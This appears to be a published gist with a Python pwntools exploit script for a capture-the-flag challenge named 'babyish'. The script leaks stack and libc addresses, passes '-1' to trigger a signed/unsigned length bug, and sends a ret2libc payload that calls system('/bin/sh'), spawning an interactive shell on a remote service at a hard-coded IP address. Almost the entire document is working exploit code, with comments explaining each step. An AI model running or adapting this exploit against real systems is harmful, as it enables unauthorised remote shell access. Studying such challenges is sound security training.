@bmphx2
Created November 20, 2017 12:31
#!/usr/bin/python
from pwn import *
LOCAL = False  # True: main() spawns ./vuln locally; False: main() connects to the remote service
def pwn():
    """Drive the "babyish" challenge service over the ``target`` channel.

    ``target`` is a module-level global (a pwntools tube) opened by
    :func:`main`; this function only reads from and writes to it and
    returns nothing.  The exchange with the service is strictly ordered,
    so the statements below must run in exactly this sequence.

    NOTE: written for Python 2 -- the payload line concatenates ``str``
    filler with the value returned by ``p32``, which is ``bytes`` under
    Python 3 pwntools and would raise ``TypeError`` there.
    """
    log.info("babyish - mphx2 @ TheGoonies\n\n")
    # Step 1: information leak.  Send a 15-byte username and read the
    # reply up to the next prompt; the reply carries raw pointer values.
    target.recvuntil("Enter username: ")
    target.sendline("A"*15)
    leak = target.recvuntil("Enter length: ")
    # Two little-endian 32-bit words are pulled from the reply at fixed
    # byte offsets (the author labels them a stack and a libc pointer).
    # u32 requires exactly 4 bytes, so a shorter-than-expected reply
    # raises here instead of silently mis-parsing.
    stack = u32(leak[20:24])
    libc = u32(leak[28:32])
    log.info("leaking libc ... %#x\n", libc)
    log.info("leaking stack ... %#x\n", stack)
    # Hard-coded deltas from the leaked libc pointer.  These presumably
    # match the libc build the challenge shipped with and are not portable
    # to any other build.
    libc_system = libc - 0x2565b
    libc_sh = libc + 0xfcead
    log.info("system @ libc %#x\n", libc_system)
    log.info("/bin/sh @ libc %#x\n", libc_sh)
    log.info("pwning...")
    # Step 2: the length check.  "-1" is accepted and echoed back by the
    # service as 4294967295 (0xffffffff): the signed input is treated as
    # an unsigned size.  That signedness mismatch is the defect this
    # challenge is built around -- a negative value passes the check yet
    # becomes a huge bound for the following read.
    target.sendline("-1")
    target.recvuntil("Enter string (length 4294967295): ")
    # Step 3: the oversized input itself: 80 bytes of filler, the leaked
    # stack pointer, 12 more filler bytes, then the two computed libc
    # addresses with a 4-byte placeholder between them (a ret2libc-style
    # layout; the exact offsets presumably come from the binary's frame).
    target.sendline("D"*80+p32(stack)+"A"*12+p32(libc_system)+"BBBB"+p32(libc_sh))
    log.info("spawning /bin/sh")
    # Hand the connection over to the operator's terminal.
    target.interactive()
def main():
    """Open the I/O channel and run the exploit routine.

    Sets the module-level global ``target`` that :func:`pwn` reads: a
    local ``process`` of ``./vuln`` when ``LOCAL`` is set, otherwise a
    ``remote`` connection to the challenge service.  Returns nothing.
    """
    global target
    target = process("./vuln") if LOCAL else remote("35.198.98.140", 45067)
    pwn()
if __name__ == "__main__":
    # Script entry point: only run when executed directly, not on import.
    main()